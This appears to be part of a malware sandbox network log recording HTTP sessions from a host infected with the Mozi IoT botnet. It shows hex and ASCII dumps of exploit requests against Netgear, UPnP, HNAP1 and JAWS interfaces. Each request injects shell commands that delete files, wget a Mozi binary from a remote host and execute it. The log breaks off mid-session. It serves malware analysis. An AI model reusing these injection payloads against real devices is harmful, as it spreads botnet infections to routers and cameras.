69 66 28 74 6f 70 2e 72 65 76 65 61 6c 41 63 74 69 6f 6e 50 61 6e 65 29 7b 20 74 6f 70 2e 72 65 76 65 61 6c 41 63 74 69 6f 6e 50 61 6e 65 28 29 3b 7d 20 76 61 72 20 63 6c 69 70 62 6f 61 72 64 54 65 78 74 20 3d 22 22 3b 3c 2f 53 43 52 49 50 54 3e 0a 3c 44 49 56 20 49 44 3d 22 63 6a 4f 75 74 65 72 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 31 30 70 78 22 3e 3c 54 41 42 4c 45 20 57 49 44 54 48 3d 31 30 30 25 20 48 45 49 47 48 54 3d 31 30 30 25 3e 3c 54 52 3e 3c 54 44 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 22 0a 3c 44 49 56 20 41 4c 49 47 4e 3d 22 43 45 4e 54 45 52 22 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 74 64 54 69 74 6c 65 22 3e 45 72 72 6f 72 3c 2f 64 69 76 3e 0a 3c 2f 44 49 56 3e 3c 42 52 3e 0a 3c 44 49 56 20 63 6c 61 73 73 3d 22 6e 6f 72 6d 48 65 61 64 65 72 22 3e 54 68 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 3a 20 5b 34 30 34 20 2d 20 61 20 64 6f 63 75 6d 65 6e 74 20 6d 69 73 73 69 6e 67 20 61 74 20 74 68 65 20 73 70 65 63 69 66 69 65 64 20 55 52 49 5d 20 57 68 69 6c 65 20 61 74 74 65 6d 70 74 69 6e 67 20 74 6f 20 61 63 63 65 73 73 20 55 52 49 3a 20 5b 2f 73 68 65 6c 6c 5d 3c 2f 44 49 56 3e 0a 3c 2f 54 44 3e 3c 2f 54 52 3e 3c 2f 54 41 42 4c 45 3e 3c 2f 44 49 56 3e 0a 3c 2f 53 43 52 49 50 54 3e 0a 3c 2f 42 4f 44 59 3e 3c
                                                                                                                  Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=2.0"/><meta name="format-detection" content="telephone=no"><STYLE>html {}</STYLE><HTML><head><meta name="cjpage" content="ErrorServlet"/><LINK ID="ctrlStyles" REL=STYLESHEET TYPE="text/css" HREF="/_common/lvl5/includes/properties_controlstyles_css.jsp"></head><BODY><SCRIPT LANGUAGE="JavaScript">if(top.revealActionPane){ top.revealActionPane();} var clipboardText ="";</SCRIPT><DIV ID="cjOuter" style="padding:10px"><TABLE WIDTH=100% HEIGHT=100%><TR><TD style="vertical-align:top;"<DIV ALIGN="CENTER" style="vertical-align:top;"><div class="stdTitle">Error</div></DIV><BR><DIV class="normHeader">The application is unable to service your request due to: [404 - a document missing at the specified URI] While attempting to access URI: [/shell]</DIV></TD></TR></TABLE></DIV></SCRIPT></BODY><


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  18192.168.2.2040316156.225.150.18380
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:37:23.057007074 CET733OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                  Feb 6, 2021 11:37:23.686255932 CET733OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                  Feb 6, 2021 11:37:23.969428062 CET742INHTTP/1.1 403 Forbidden
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:19 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 1157
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 bd fb d6 b9 b7 c3 ce ca 3a 20 b7 c3 ce ca b1 bb be dc be f8 a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>403 - : </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  19192.168.2.2039288190.189.194.4649152
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:37:33.073523998 CET785OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                                                                  Host: 190.189.194.46:49152
                                                                                                                  Content-Length: 630
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 2f 74 6d 70 2f 4d 6f 7a 69 2e 6d 20 64 6c 69 6e 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 36 33 34 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 35 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 53 4f 41 50 45 4e 56 3a 42 6f 64 79 3e 3c 53 4f 41 50 45 4e 56 3a 65 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
                                                                                                                  Feb 6, 2021 11:37:33.380716085 CET786INHTTP/1.1 500 Internal Server Error
                                                                                                                  CONTENT-LENGTH: 412
                                                                                                                  CONTENT-TYPE: text/xml; charset="utf-8"
                                                                                                                  DATE: Sat, 06 Feb 2021 10:37:31 GMT
                                                                                                                  EXT:
                                                                                                                  SERVER: Linux/2.6.39.3, UPnP/1.0, Portable SDK for UPnP devices/1.6.18
                                                                                                                  X-User-Agent: redsonic
                                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 0a 3c 73 3a 42 6f 64 79 3e 0a 3c 73 3a 46 61 75 6c 74 3e 0a 3c 66 61 75 6c 74 63 6f 64 65 3e 73 3a 43 6c 69 65 6e 74 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 0a 3c 66 61 75 6c 74 73 74 72 69 6e 67 3e 55 50 6e 50 45 72 72 6f 72 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 0a 3c 64 65 74 61 69 6c 3e 0a 3c 55 50 6e 50 45 72 72 6f 72 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 63 6f 6e 74 72 6f 6c 2d 31 2d 30 22 3e 0a 3c 65 72 72 6f 72 43 6f 64 65 3e 34 30 31 3c 2f 65 72 72 6f 72 43 6f 64 65 3e 0a 3c 65 72 72 6f 72 44 65 73 63 72 69 70 74 69 6f 6e 3e 49 6e 76 61 6c 69 64 20 41 63 74 69 6f 6e 3c 2f 65 72 72 6f 72 44 65 73 63 72 69 70 74 69 6f 6e 3e 0a 3c 2f 55 50 6e 50 45 72 72 6f 72 3e 0a 3c 2f 64 65 74 61 69 6c 3e 0a 3c 2f 73 3a 46 61 75 6c 74 3e 0a 3c 2f 73 3a 42 6f 64 79 3e 0a 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0a
                                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><s:Fault><faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>401</errorCode><errorDescription>Invalid Action</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  2192.168.2.2042806144.76.43.3780
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:35:52.068749905 CET283OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                  Host: 144.76.43.37:80
                                                                                                                  Content-Type: text/xml; charset="utf-8"
                                                                                                                  SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                  Content-Length: 640
                                                                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                  Feb 6, 2021 11:35:52.140109062 CET283INHTTP/1.0 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Sat, 06 Feb 2021 10:35:52 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                  Data Ascii: 404 page not found


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  20192.168.2.203277623.236.242.2680
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 6, 2021 11:37:36.986741066 CET800OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 23.236.242.26:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:37:37.184235096 CET802INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:38 GMT
                                                                                                                  Content-Length: 1163
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  21192.168.2.205445423.12.191.11880
                                                                                                                  TimestampkBytes transferredDirectionData
